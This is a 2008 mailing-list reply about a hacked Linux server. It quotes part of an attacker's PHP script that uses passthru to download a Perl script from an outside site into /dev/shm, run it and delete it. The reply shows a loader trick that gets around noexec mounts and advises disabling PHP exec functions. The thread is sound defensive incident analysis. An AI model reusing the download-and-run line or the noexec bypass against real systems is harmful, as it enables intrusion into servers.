Re: ping22: can not kill this process
On Jan 3, 2008 6:18 PM, Mike Wang <comritesecurity@gmail.com> wrote:
> Hi folks
[snip]
> http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
> > bb.txt;perl bb.txt;rm -f bb.txt*');
> passthru('id');
> ?>
>
> the /tmp was mounted as rw,noexec,nosuid, so it cannot run.
nope. See below.
> but not the /dev/shm, so the hacked script downloaded to /dev/shm, and run
> from there.
>
> what kind applications are using /dev/shm? I googled around,seem not find
> much information.
> right now I mount i as rw,noexec,nosuid.
A lot of stuff does. /dev/shm is recommended by LSB if I'm not
mistaken. I know a few apps who use this (including my own).
Well done tracking this script kiddie.
This is a very stupid hack.
By the way, noexec doesn't buy you anything here. perl bb.txt
should've worked no matter if /tmp is exec or not. The way I see it
they both worked (/tmp and /dev/shm). And besides, noexec can't even
stop executables anyway. That's the stupidest of flags for mount:
$> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo
foo
And don't even think of making /lib/ld-linux.so.2 non exec or
something else... Your system will just break in a million pieces ;-)
It's time to tell PHP (via php.ini) not to allow any of those
functions that allow executing stuff from the system (system,
passthru, whatever).
Also, you might want to consider using Virtual Servers (Linux VServer,
Xen, vmware, etc).
Hack me once, shame on you. Hack me any other time with the same
stupid attack vector, shame on me.
Good that you took time to report this.
--
----)(-----
Luis Mondesi
Maestro Debiano
----- START ENCRYPTED BLOCK (Triple-ROT13) ------
Gur Hohagh [Yvahk] qvfgevohgvba oevatf gur fcvevg bs Hohagh gb gur
fbsgjner jbeyq.
----- END ENCRYPTED BLOCK (Triple-ROT13) ------
Reply to: